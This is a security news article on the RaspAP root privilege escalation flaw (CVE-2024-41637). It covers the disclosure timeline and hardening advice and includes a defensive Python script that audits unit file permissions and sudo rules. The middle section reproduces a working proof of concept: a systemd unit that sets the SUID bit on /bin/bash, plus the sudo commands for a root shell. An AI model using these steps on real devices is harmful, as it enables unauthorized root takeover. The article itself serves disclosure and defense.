RaspAP Vulnerability Allows Hackers to Gain Privileges on Raspberry Pi Devices


A critical local privilege escalation vulnerability (CVE-2024-41637) was found in RaspAP, an open-source project for turning Raspberry Pi devices into wireless access points or routers. Rated 9.9 (Critical) on the CVSS scale, it affects versions before 3.1.5 and was publicly disclosed on July 27, 2024, after unsuccessful attempts to reach the RaspAP security team.

RaspAP Vulnerability

RaspAP is popular in educational settings, IoT applications, and among homelab enthusiasts for its simple web-based management of wireless networks.

The 0xZon report indicates that the vulnerability arises from inadequate access controls, allowing the www-data user to write to the restapi.service file and execute critical commands with sudo privileges without needing a password.

This flaw enables attackers to escalate their privileges from www-data to root, posing a significant security risk.

Security researcher Aaron Haymore, who identified the flaw, created a proof of concept (PoC) to demonstrate how it can be exploited.

The exploitation involves modifying the restapi.service file to run arbitrary code with root privileges. Here’s a brief outline of the process:

Edit the Service Configuration: As the www-data user, modify the restapi.service file located at /lib/systemd/system/restapi.service with the following configuration:

[Unit]
Description=Set SUID bit on /bin/bash
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'echo "Service started. Use systemctl to stop the service to set the SUID bit on /bin/bash."'
ExecStop=/bin/bash -c 'chmod u+s /bin/bash'
Restart=always
RestartSec=1

[Install]
WantedBy=multi-user.target

  1. Reboot the Machine: Execute sudo /sbin/reboot to restart the system and reload the daemon.
  2. Start the Modified Service: After the reboot, use sudo /bin/systemctl start restapi.service to start the modified service.
  3. Stop the Service: Stop the service with sudo /bin/systemctl stop restapi.service to set the SUID bit.
  4. Gain Root Access: Run /bin/bash -p to obtain a root shell.

These steps show how an attacker can exploit the vulnerability to gain root access, highlighting the critical nature of this security flaw.

The vulnerability was reported to the RaspAP security team on July 16, 2024, with follow-ups on July 18, 23, and 26, but no response was received. It was publicly disclosed on July 27, 2024.

This incident underscores the critical importance of proper access controls and timely communication. Allowing low-privilege users to modify service files and use sudo without restrictions can lead to severe security breaches, including privilege escalation and arbitrary code execution.

To prevent such vulnerabilities, adhere to the following best practices for access control:

  1. Implement the Principle of Least Privilege: Ensure users have only the minimal access necessary to perform their duties. Limit write permissions to service files to essential personnel only.
  2. Audit and Restrict sudo Access: Regularly review sudoers configurations to ensure only trusted users can execute commands with elevated privileges. Avoid using broad NOPASSWD settings that could be exploited.
  3. Secure Service Configurations: Protect critical service configurations and scripts from unauthorized modifications by using proper file permissions and ownership settings.
  4. Monitoring and Logging: Implement comprehensive logging and monitoring to detect and alert on unauthorized changes or suspicious activities. Regularly review logs to identify potential exploitation attempts early.
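Practices 2 and 3 can be checked together, because the risk described above comes from the combination of a writable unit file and a passwordless sudo rule for the same unit. The audit below is an added example, not code from RaspAP or the researcher's report; the function names and the sample sudoers lines are constructed for illustration, and the sudoers parsing assumes simple one-user rules.

```python
import stat
from pathlib import Path

def writable_units(unit_dir, trusted_uids=frozenset({0})):
    """Unit files owned by an untrusted uid or writable by group/other."""
    findings = {}
    for path in sorted(Path(unit_dir).glob("*.service")):
        st = path.stat()  # follows symlinks: the target is what systemd loads
        reasons = []
        if st.st_uid not in trusted_uids:
            reasons.append(f"owner uid {st.st_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append(f"mode {stat.S_IMODE(st.st_mode):04o}")
        if reasons:
            findings[path.name] = ", ".join(reasons)
    return findings

def nopasswd_commands(sudoers_text, account):
    """Commands `account` may run through sudo without a password."""
    commands = []
    for line in sudoers_text.replace("\\\n", " ").splitlines():
        fields = line.split(None, 1)
        if len(fields) < 2 or fields[0] != account or "NOPASSWD:" not in fields[1]:
            continue
        spec = fields[1].split("NOPASSWD:", 1)[1]
        commands += [c.strip() for c in spec.split(",") if c.strip()]
    return commands

def escalation_paths(unit_dir, sudoers_text, account, trusted_uids=frozenset({0})):
    """Writable units that `account` can also control via passwordless sudo."""
    units = writable_units(unit_dir, trusted_uids)
    paths = []
    for cmd in nopasswd_commands(sudoers_text, account):
        words = cmd.split()
        if Path(words[0]).name == "systemctl":
            paths += [(u, cmd, units[u]) for u in words[1:] if u in units]
    return paths

# Constructed sample rules, not RaspAP's real sudoers file.
SAMPLE_SUDOERS = """\
www-data ALL=(ALL) NOPASSWD:/sbin/reboot
www-data ALL=(ALL) NOPASSWD:/bin/systemctl start restapi.service
www-data ALL=(ALL) NOPASSWD:/bin/systemctl stop restapi.service
www-data ALL=(ALL) NOPASSWD:/bin/systemctl restart hostapd.service
"""
if __name__ == "__main__":
    for unit, cmd, why in escalation_paths("/lib/systemd/system", SAMPLE_SUDOERS, "www-data"):
        print(f"{unit}: {why}; sudo rule: {cmd}")
```

Any result from `escalation_paths` is a unit whose file should be returned to root ownership with mode 0644 and whose sudo rule should be reviewed.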


About the Author:

FirstHackersNews- Identifies Security
